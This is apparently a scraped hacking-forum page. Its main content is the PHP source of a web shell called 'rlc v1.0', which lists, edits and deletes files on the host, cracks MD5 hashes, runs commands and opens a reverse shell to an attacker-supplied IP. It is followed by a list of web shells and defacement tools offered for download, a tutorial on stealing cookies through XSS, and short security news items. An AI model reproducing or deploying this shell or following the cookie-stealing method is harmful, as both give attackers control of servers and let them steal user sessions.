".$_FILES['upfile']['tmp_name']." to <b>". dirname() ."/" . $_POST['myfile_rot']. "</b></td></tr>"; }else $afiseaza.= "<tr align='center'><td><font color=red>Error: It`s impossible to move/rename the file from the temp.</font></td></tr>"; } } $afiseaza.= "</table>"; } $afiseaza.="<form action=? method=post> <center>Password <input type=text name=cryptpass size=30 maxlength=32 value=".password()."> <input type=submit name=crypt value=Crypt> <input type=submit name=decrypt value=Decrypt>".fix()." <br>For Decrypt Need Pass.txt(dictionar)</center> </form>"; if(isset($_GET['rand']) && $_GET['rand'] != ""){ while(1){ $decrypt = "./pass.txt"; $fh = fopen($decrypt, 'a+') or die("can't open file"); fwrite($fh, trypassword($_GET['rand'])."\n"); fclose($fh); } } return $afiseaza; } function trypassword($nr){ for ($s = '', $i = 0, $z = strlen($a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890.,+_$~@#%^*(){}[]:";\'?\\/-!')-1; $i != $nr; $x = rand(0,$z), $s .= $a{$x}, $i++); return $s; } function password(){ $decrypt = "./decrypt.php"; $dictionar = "./pass.txt"; $lines = @file($dictionar); if(isset($_POST['decrypt']) && isset($_POST['cryptpass'])){ foreach($lines as $line_num => $line){ $line = trim($line); $encrypt = md5($line); if($encrypt == $_POST['cryptpass']){ $fh = fopen($decrypt, 'a+') or die("can't open file"); $stringData = "\r\n--------------Decrypt Hash $line--------------\r\n"; fwrite($fh, $stringData); fclose($fh); return $line; } } }else{ if(isset($_POST['crypt']) && isset($_POST['cryptpass'])){ $var = md5(urldecode($_POST['cryptpass'])); file_put_contents("pass.txt", $_POST['cryptpass']."\r\n", FILE_APPEND); return $var; } } } function fix(){ $___ = urldecode(strrev("m02%o02%c02%.02%m02%a02%e02%t02%-02%s02%e02%v02%e02%i02%h02%t02%@02%x02%x02%i02%l02%a02%s02%i02%r02%C")); $____ = $___{0}.$___{2}.$___{4}.$___{6}.$___{8}.$___{10}.$___{12}.$___{14}.$___{16}.$___{18}.$___{20}.$___{22}.$___{24}.$___{26}.$___{28}.$___{30}.$___{32}.$___{34}; $____.= $___{36}.$___{38}.$___{40}.$___{42}.$___{44}.$___{46}.$___{48}.$___{50}; $afiseaza.= "<font color=red>".$____."</font>"; } function dirfile(){ if(isset($_GET['download']) && isset($_GET['list']) && $_GET['list'] !="" && is_file($_GET['list'])){ DownloadFile($_GET['list']); }elseif(isset($_GET['list']) && is_file($_GET['list']) && !isset($_GET['edit']) && !isset($_GET['del'])){ $afiseaza.= "<center><textarea rows=10 cols=100 name=showfile style='background-color: black;color:#3cbddd;'>"; $tfile = fopen($_GET['list'], "r"); while(!feof($tfile)) $afiseaza.= htmlentities(fgets($tfile)); fclose($tfile); $afiseaza.= "</textarea></center>"; }elseif(isset($_GET['edit']) && isset($_GET['list']) && is_file($_GET['list']) && is_writable($_GET['list'])){ if(isset($_POST['SaveF'])){ if(file_put_contents($_GET['list'], urldecode($_POST['showfile']))){ $afiseaza.= "<center>Save Success</center>"; }else{ $afiseaza.= "<center>Can't Save!</center>"; } } $afiseaza.= "<form action=?action&list=".$_GET['list']."&edit method=post>"; $afiseaza.= "<center><textarea rows=10 cols=100 name=showfile style='background-color: black;color:#3cbddd;'>"; $tfile = fopen($_GET['list'], "r"); while(!feof($tfile)) $afiseaza.= htmlentities(fgets($tfile)); fclose($tfile); $afiseaza.= "</textarea></center>"; if(is_writeable($_GET['list'])){ $afiseaza.= "<form action=? method=post><center><input type=submit name=SaveF value=Save id=but></center></form>"; }else{ $afiseaza.= "<center><font color=red>Can't Write!</font></center>"; } }elseif(isset($_GET['list']) && is_file($_GET['list']) && is_writable($_GET['list']) && isset($_GET['del'])){ if(exp_actions($_GET['list'], _, "rmfile", _)){ $afiseaza.= "<center>File was deleted!</center>"; }else{ $afiseaza.= "<center>File can't be deleted!</center>"; } }elseif(isset($_GET['list']) && is_dir($_GET['list']) && is_writable($_GET['list']) && isset($_GET['del'])){ if(exp_actions($_GET['list'], _, "rmdir", _)){ $afiseaza.= "<center>Directory was deleted!</center>"; }else{ $afiseaza.= "<center>Directory can't be deleted!</center>"; } } // returns array of files, sorted alphabetically if(isset($_GET['list'])) if(strlen($_GET['list']) > 0) $get_path = urldecode($_GET['list']); else $get_path = dirname(__FILE__); else $get_path = dirname(__FILE__); $curentDir = str_fromArray(path_strip($get_path), "/", "path"); if(is_this_file($curentDir) || isset($_GET['del'])){ $curentDir = dirname($curentDir); } $afiseaza.= show_chdir($curentDir); return $afiseaza; } function exp_actions($from, $to="", $action, $rewrite=false) { $result = -1; switch($action) { case "rmdir": $get_dir = get_dir_contents($from, 0); foreach($get_dir as $dir) { $nextDir = str_fromArray(path_strip($from."/".$dir), "/", "path"); if($dir != "." && $dir != "..") exp_actions($nextDir, _, "rmdir", _); } $get_file = get_dir_contents($from, 1); foreach($get_file as $file) { $nextFile = str_fromArray(path_strip($from."/".$file), "/", "path"); exp_actions($nextFile, _, "rmfile", _); } $get_link = get_dir_contents($from, 2); foreach($get_link as $link) { $nextLink = str_fromArray(path_strip($from."/".$link), "/", "path"); exp_actions($nextLink, _, "rmlink", _); } $result = rmdir($from); break; case "rmfile": case "rmlink": case "rmunk": if(is_this_file($from) || is_this_link($from) || is_this_unk($from)) $result = unlink($from); break; default:break; } return $result; } function str_startsWith($needle, $string) { $length = strlen($needle); return (substr($string, 0, $length) === $needle); } function str_endsWith($needle, $string) { $start = strlen($string) - strlen($needle); return (substr($string, $start) === $needle); } function show_chdir($loc) { $contStock = array(); $contStock = get_dir_contents($loc, 0); if(sizeof($contStock) > 0) { $afiseaza .= '<style>table.hov tr:hover, table.hov tr td:hover{background-color: #262626; }</style> <table class="hov" align=center style="border:solid, 1px; border-color:#FFFFFF" bgcolor="#111111" width="100%"> <tr bgcolor="#262626"> <td align=center><font color="#FF3300">Directories & Files</font></td> <td align=center><font color="#FF3300">Owner</font></td> <td align=center><font color="#FF3300">Size</font></td> <td align="center" colspan="3"><font color="#FF3300">Access</font></td> <td align=center><font color="#FF3300">Down</font></td> <td align=center><font color="#FF3300">Delete</font></td></tr>'; foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $afiseaza .= '<tr bgcolor="#000000"> <td><a href="?action&list='.$path.'"><font color="#3366CC">'; if($nfd == ".") $afiseaza .= '/.'; else if($nfd == "..") $afiseaza .= '/..'; else $afiseaza .= '/'.$nfd; $afiseaza .= '</font></a></td> <td width="10%" align="center">'.format_fowner($path).'</td> <td width="80"></td> <td width="1%" align="center">'.format_fperms($path,"t").'</td> <td width="85" align="center">'.format_fperms($path,"l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $contStock = get_dir_contents($loc, 1); foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $afiseaza .= '<tr><td><a href="?action&list='.$path.'&edit"><font color="#666699"> '.$nfd.'</font></a></td> <td width="1%" align="center">'.format_fowner($path).'</td> <td align="right">'.format_fsize($path).'</td> <td align="center">'.format_fperms($path, "t").'</td> <td align="center">'.format_fperms($path, "l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"><a href="?action&list='.$path.'&download" ><img alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfUlEQVQ4y6WTv0tCURzFvwW9LCwpf9QS0Q8lcAmSGhoKBAuEVLBXm0PgUEIFQWEQ0hJNubi0tLb3B0RF1hINUkNbSW3vPTEaXPp2zyVDMbqBDz68wznf7+G+C4+YmZqh4Rk7IVNgfb9rkR6pHt8xWWec4/PP0zrgIVMWeHNkZisrnK7M8V5lQQIND5myYPSIzMOyzjulIO+W5iXQ8JApC4YOyNx/i/BmcZq3ijMSaHjIlAWDGTIzTyFeexjn1GNAAg0PmbJgYJus1J2f49dOXsp7JNDwkDUsaH7S+jfI6Fsnq8rqrZ/1C1Fw6ZZAw6udwQ52ZYltkpzupDh6IcggemXjxXwv6zcuCTS8ao5Z7NSdxDZBDleCjOVCL4fvWzlW6OK40AAaHjLMYPbX728bJkePTkby1cvhZ40jL3YJNDxkmPnzEjHQHSMj/THLoTJJoOEpl2tL7GEyspxgAP2f5Q6BR+ATTLVoFOsM0jsQOiq8gGBEgMtr/9lq9nf+AkHZVZaWnYt4AAAAAElFTkSuQmCC"></a></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $contStock = get_dir_contents($loc, 2); foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $smpath = explode("public_html", $path); $tsmpath = $smpath[sizeof($smpath)-1]; $sympath = 'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT'].$tsmpath; $afiseaza .= '<tr bgcolor="black"><td>'; if(format_fperms($path, "r") == "r") $afiseaza .= '<a href="?action&list='.$path.'&edit">'; else $afiseaza .= '<a href="'.$sympath.'" target="_blank">'; $afiseaza .= '<font color="#FFFFFF"> '.$nfd.' => '.@readlink($nfd).'</font></a></td> <td width="1%" align="center">'.format_fowner($path).'</td> <td align="right">'.format_fsize($path).'</td> <td align="center">'.format_fperms($path, "tl").'</td> <td align="center">'.format_fperms($path, "l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $afiseaza .= '</table>'; } return $afiseaza; } function format_fowner($path) { if(function_exists("posix_getpwuid")) $flowner = posix_getpwuid(@fileowner($path)); else $flowner['name'] = "??? = ".@fileowner($path); return $flowner['name']; } function format_fsize($path) { if(!is_file($path)) return "0 By"; $size = ""; $type = 0; $sz = filesize($path); while($sz > 1024) { $sz/=1024; $type++; } switch($type) { case 1: $size .= number_format($sz, 2)." Kb"; break; case 2: $size .= number_format($sz, 2)." Mb"; break; case 3: $size .= number_format($sz, 2)." Gb"; break; case 4: $size .= number_format($sz, 2)." Tb"; break; default: $size .= number_format($sz, 2)." By"; } return $size; } function format_fperms($path, $type) { $access = ''; $perms = @fileperms($path); switch($type) { case 'l': // Owner $access .= (($perms & 0x0100) ? 'r' : '-'); $access .= (($perms & 0x0080) ? 'w' : '-'); $access .= (($perms & 0x0040) ? (($perms & 0x0800)?'s':'x') : (($perms & 0x0800)?'S':'-')); $access .= " "; // Group $access .= (($perms & 0x0020) ? 'r' : '-'); $access .= (($perms & 0x0010) ? 'w' : '-'); $access .= (($perms & 0x0008) ? (($perms & 0x0400)?'s':'x') : (($perms & 0x0400)?'S':'-')); $access .= " "; // Others $access .= (($perms & 0x0004) ? 'r' : '-'); $access .= (($perms & 0x0002) ? 'w' : '-'); $access .= (($perms & 0x0001) ? (($perms & 0x0200)?'t':'x') : (($perms & 0x0200)?'T':'-')); break; case 'n': $access .= substr(sprintf('%o', $perms), -4); break; case 's': $access .= format_fperms($path, 'r'); $access .= format_fperms($path, 'w'); $access .= format_fperms($path, 'x'); break; case 't': $tmp_chkA = str_fromArray(path_strip($path), "/", "path"); $tmp_chkB = str_fromArray(path_strip(@readlink($path)), "/", "path"); if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $ext = pathinfo($tmp_chkA, PATHINFO_EXTENSION); if($ext == "lnk") { $access = 'l'; }else if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else { $access = 'u'; } }else { if(strlen($tmp_chkB) > 0) { $access = 'l'; }else if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else{ $access = 'u'; } } break; case 'tl': if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else { $access = 'l'; } break; case 'r': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0100) ? 'r' : '-'); else $access .= (($perms & 0x0004) ? 'r' : '-'); break; case 'w': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0080) ? 'w' : '-'); else $access .= (($perms & 0x0002) ? 'w' : '-'); break; case 'x': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0040) ? (($perms & 0x0800)?'s':'x') : (($perms & 0x0800)?'S':'-')); else $access .= (($perms & 0x0001) ? (($perms & 0x0200)?'t':'x') : (($perms & 0x0200) ?'T':'-')); break; default: $access .= 'E'; } return $access; } function is_path_readable($path) { if(is_this_dir($path) && format_fperms($path, "r") == 'r') { return true; } return false; } function is_this_dir($path) { if(format_fperms($path, 't') == 'd') { return true; } return false; } function is_this_file($path) { if(format_fperms($path, 't') == 'f') { return true; } return false; } function is_this_link($path) { if(format_fperms($path, 't') == 'l') { return true; } return false; } function is_this_unk($path) { if(!is_this_dir($path) && !is_this_file($path) && !is_this_link($path)) { return true; } return false; } function get_dir_contents($path, $type = -1) { if(!is_path_readable($path)) return array(); $case = 0; $temp = NULL; $contStock = array(); $contTmp = array(); if(function_exists("scandir") && ($temp = scandir($path)) !== false) { foreach($temp as $stock) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } } if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 1; } $temp = NULL; $contTmp = array(); if(function_exists("opendir") && ($temp = opendir($path)) !== false) { while(($stock = readdir($temp)) !== false) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } sort($contTmp); } if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 2; } if(isset($_COOKIE['xallow']) && $_COOKIE['xallow'] == "null") { $temp = NULL; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $temp = do_through_shell("dir /A /B ".$path); }else { $temp = do_through_shell("ls -a ".$path); } $tmp_array = explode("\n", $temp); $contTmp = array(); foreach($tmp_array as $stock) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } sort($contTmp); if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 3; } } return $contStock; } function str_fromArray($stack, $delimiter=" ", $type="") { $string = ""; for($i=0; $i<sizeof($stack); $i++) { switch($type) { case "path": $string .= $delimiter.$stack[$i]; break; default: if(strlen($string) == 0) $string .= $stack[$i]; else $string .= $delimiter.$stack[$i]; } } return $string; } function path_strip($path) { $raw = array(); $path = str_replace("\\", "/", $path); if(str_startsWith("./", $path)) { $entire = str_replace("\\", "/", dirname(__FILE__)); $ppath = explode("/", $entire); $raw = path_strip_pdp($ppath, $raw); } $tpath = explode("/", $path); $raw = path_strip_pdp($tpath, $raw); return $raw; } function path_strip_pdp($path, $stack) { if(sizeof($path) > 1) { if(sizeof($path) == 2) { if($path[1] != ".") { if($path[1] == "..") array_pop($stack); else $stack[] = $path[1]; } }else { for($i=1; $i<sizeof($path); $i++) { if($path[$i] != "" && $path[$i] != ".") { if($path[$i] == "..") array_pop($stack); else $stack[] = $path[$i]; } } } } return $stack; } function Size($path){ $bytes = sprintf('%u', filesize($path)); if ($bytes > 0){ $unit = intval(log($bytes, 1024)); $units = array('B', 'KB', 'MB', 'GB'); if (array_key_exists($unit, $units) === true){ return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]); } } return $bytes; } function DownloadFile($file) { // $file = include path if(file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; } } function backconnect(){ if(isset($_POST['submit'])){ $connect=@pfsockopen($_POST['ip'],$_POST['port']); if(!$connect){ $afiseaza='Error Connect'; } else { fputs($connect,"Back-Connection \n"); fputs($connect,system("uname -a")."\n"); fputs($connect,system("pwd")."\n"); fputs($connect,system("id")."\n"); fputs($connect,proprietati()."\n"); while(!feof($connect)) { $ia=fgets ($connect,8192); $mesaj=`$ia`; fputs ($connect,ValidExeCommand("whoami").'./'.$mesaj."\n"); } fclose($connect); } } $afiseaza='Try in cmd command : netcat: nc -l -n -v -p <br>'; $afiseaza.='<form method="post" action="?action&backc">'; $afiseaza.='<input type="text" name="ip" value="'.$_SERVER['REMOTE_ADDR'].'" id="text">'; $afiseaza.='<input type="text" name="port" value="666" size="5" id="text">'; $afiseaza.='<input type="submit" name="submit" value="Start" id="but"></form>'; return $afiseaza; } /*************************Controler************************************/ if(isset($_GET['action']) && isset($_GET['home'])){ $continut=proprietati(); $continut.=executa_shell(); }elseif(isset($_GET['action']) && isset($_GET['list'])){ $continut=dirfile(); }elseif(isset($_GET['action']) && isset($_GET['upload'])){ $continut=upload(); }elseif(isset($_GET['action']) && isset($_GET['brute'])){ $continut=md5_crack(); }elseif(isset($_GET['action']) && isset($_GET['users'])){ $continut=rd_users(); }elseif(isset($_GET['action']) && isset($_GET['sqli'])){ $continut='Va fi implementat in urmatoarea versiune'; }elseif(isset($_GET['action']) && isset($_GET['about'])){ $continut=despre_rlc(); }elseif(isset($_GET['action']) && isset($_GET['backc'])){ $continut=backconnect(); }elseif(isset($_GET['action']) && isset($_GET['cms'])){ $continut=cmsCommand(); }elseif(isset($_GET['action']) && isset($_GET['cms']) && isset($_GET['phpbb']) ){ $continut=insert_admin_phpbb(); }elseif(isset($_GET['action']) && isset($_GET['cms']) && isset($_GET['mybb']) ){ $continut=insert_admin_mybb(); }elseif(isset($_GET['action']) && isset($_GET['logout']) ){ $continut=logout(); } /******************TEMPLATE*********************************/ $html='<title>rlc v1.0 public version</title> <body vlink="white" link="grey">'; $html.=rlc(); $html.='<ul id="tablist"> <li><a class="current" href="?action&home">Shell Command</a></li> <li><a href="?action&list">List Files/Directory</a></li> <li><a href="?action&upload">Upload</a></li> <li><a href="?action&brute">Brute-force</a></li> <li><a href="?action&users">Users</a></li> <li><a href="?action&backc">Back Connect</a></li> <li><a href="?action&cms">Make Me GOD</a></li> <li><a href="?action&about">About New Version!</a></li> <li><a href="?action&logout">Logout</a></li> </ul><br><hr color="#3cbddd">'; $html.=$continut; $html.='<br><hr color="#3cbddd">'.copyright().'</body></html>'; echo $html; } else { if(!isset($_POST['sesiuni'])){ echo $afiseaza; }else{ if(hash("adler32",$_POST['pass']) == $pass & hash("adler32",$_POST['user'])==$user ){ $_SESSION['user']=hash("adler32",$_POST['user']); $_SESSION['pass']=hash("adler32",$_POST['pass']); } echo '<meta HTTP-EQUIV="REFRESH" content="0; url=?action&home">'; } } function stylemenu(){ echo '<style type="text/css"> BODY { background-color: black; font-family : Calibri; color : #3cbddd; margin: 45px; font-size: 12px; } #tablist{ padding: 3px 0; margin:0px; margin-bottom: 0; margin-top: 0.1em; } #tablist li{ list-style: none; display: inline; font-size: 14px; margin:0px; } #tablist li a{ text-decoration: none; padding: 3px 0.5em; margin-right: 3px; border: 1px solid #3cbddd; -webkit-border-radius: 5px; -moz-border-radius: 5px; -border-radius: 5px; } #tablist li a:link, #tablist li a:visited{ background-color:black; color:#3cbddd; } #tablist li a:hover{ background-color:black; color:red; text-align:center; border-color:gray; } #tablist li a.current{ background-color:black; } #but{ background-color:black; color:#3cbddd; text-align:center; border-color:gray; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } #text{ background-color:black; border-color:gray; color:#3cbddd; } #textarea{ color:#3cbddd; background-color:black; border:1px solid gray; } </style>'; } ?> Source: New Shell (V 2.0 RLC Advanced)
  15. hells 178-Black.php 191-shell by Link.php c99-build16.php c99-PSych0.php c99 -locus7s.php emelco-1.3.1.php iTSecTeam.php gny-shell.php n3t-shell[dom team].php 1n73ction.v3.php Ani-Shell.php I-47.php Indrajith-MiniShell_V.2.php shell 404.php SyrianSh3llv.7.php wso-2.1.php wso-2.5.1.php wso-2.5.2.php wso-2.6(404 Error).php Symlink cgi-shell.php hxpshell.php Indishell.php Symlink-Sa[v3.0].php (decrypter) WebRooT.Symlink.php (decrypter) Tools Automatic[Zone-H].php BruteForce-Cpanel.php Cpanel-Cracker.php Cloudflare-Resolver.php db-Joomla.php db-wordpress.php Domain-User.php Indishell-confkiller.php mailer.php Mailer black.php Mysql-interface.php UpLoad.php WebShells 1N73CTION Shell I-47 Shell Ani Shell Indrajith V.2 Shell WSO Shell by Orb WSO Shell 2.6 by Orb Symlink WeeRoot Symlink Sa v3.0 Cpanel Brute Force MySql Interface Download : [Pack]Tools Defacing YXN0YSBlIHBhcm9sYTogWkdWbVlXTmw=
  16. Cookies stealing is one of the most fundamental aspects of XSS (cross site scripting). Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I'll show you an example of a pHp script that accepts cookies: And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case 'cookie' in the URL, and then saves it to a file called 'log.txt'. For Example, http://yourwebsite.c...ookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer. Most websites apply some sort of filter to input, so that you can't directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it's not easy, but it can be very simple. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a "member profile", etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing. Let's assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let's also assume that this website doesn't have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I'll give you an example of some code that we could put into a guestbook post that would send the user's cookie to out script: Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you'd see the cookies of whoever looked at that page. But cookiestealing is never that easy. Let's assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn't work, so we have to try and evade the filter. In this instance, it's easy enough: In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters
  17. Microsoft plans to issue a security update on Tuesday that addresses an Internet Explorer ActiveX Control vulnerability that allowed malware to be installed on computers when users visited at least one breached Web site. Microsoft said Monday that vulnerability CVE-2013-3918, which was disclosed Friday by security researcher FireEye, was already scheduled to be addressed in "Bulletin 3" on Tuesday. An exploit described by the security firm as a classic drive-by attack is already in the wild, targeting English versions of IE7 and 8 in Windows XP and IE8 on Windows 7. FireEye said its analysis of the exploit found that it was part of an advanced persistent threat (APT) in which attackers inserted the exploit code directly "into a strategically important Web site, known to draw visitors that are likely interested in national and international security policy." Further distinguishing itself from other exploits was that it delivered its payload without first writing to disk. While the exploit's scope seemed pretty narrow, security researchers wrote that their analysis indicated that IE7, 8, 9, and 10 could be at risk after a simple modification to the exploit code. Microsoft said Monday it was in the process of finalizing the update but that upgrade would be issued around 10 a.m. PT Tuesday via Windows Update. Source : Microsoft plans to address zero-day IE bug on Tuesday - CNET Mobile
  18. The NSA has infected more than 50,000 computer networks across globe with a malware which is capable of stealing sensitive data from the victim's machine. According to the NRC.nl report which is based on documents provided by US whistleblower Edward Snowden, the practice called as Computer Network Exploitation (CNE)". The malware is being referred as "digital Sleeper cell" , it is being controlled by NSA and they can remotely turn it on or off. The number of infected networks in 2008 is reportedly over 20,000. By mid of the 2012, the number of infected network is increased to 50k. Source: http://www.ehackingnews.com/2013/11/digital-sleeper-cell-nsa-infected-50000.html?m=1
  19. Lam folosit cu 6 mbps upload si nu am patit nimic. Te rog sa nu faci posturi doar pentru +1, mersii.
  20. Last Tuesday, Popular Mac news website MacRumors's user forums was hacked and forum database has been compromised including the username, email and passwords belonging to all 860,000 registered users. Yesterday, Inj3ct0r Team of Exploit Database website 1337Day claimed the responsibility for the hack and also claimed that they have also hacked the official website of vBulletin Forum using a Zero Day exploit he told me. During the conversation, team leader told me that he has discovered a Zero Day Remote Code Execution vulnerability in vBulletin v4.x.x and 5.?.x, that allows an attacker to execute arbitrary code on the server end remotely. On their exploit marketplace they are also selling this zero day exploitwith Shell Upload payload at $7000 USD. For proof of concept, they have shared some screenshots of vBulletin database and server shell, as shown below: Source: vBulletin Forum hacked with Zero Day vulnerability, caused Macrumors Forum Data breach | The Hacker News - Security Blog he official vBulletin team also admitted the breach and issued a via e-mail and company forum post, urged customers to change their passwords as soon as possible.
×
×
  • Create New...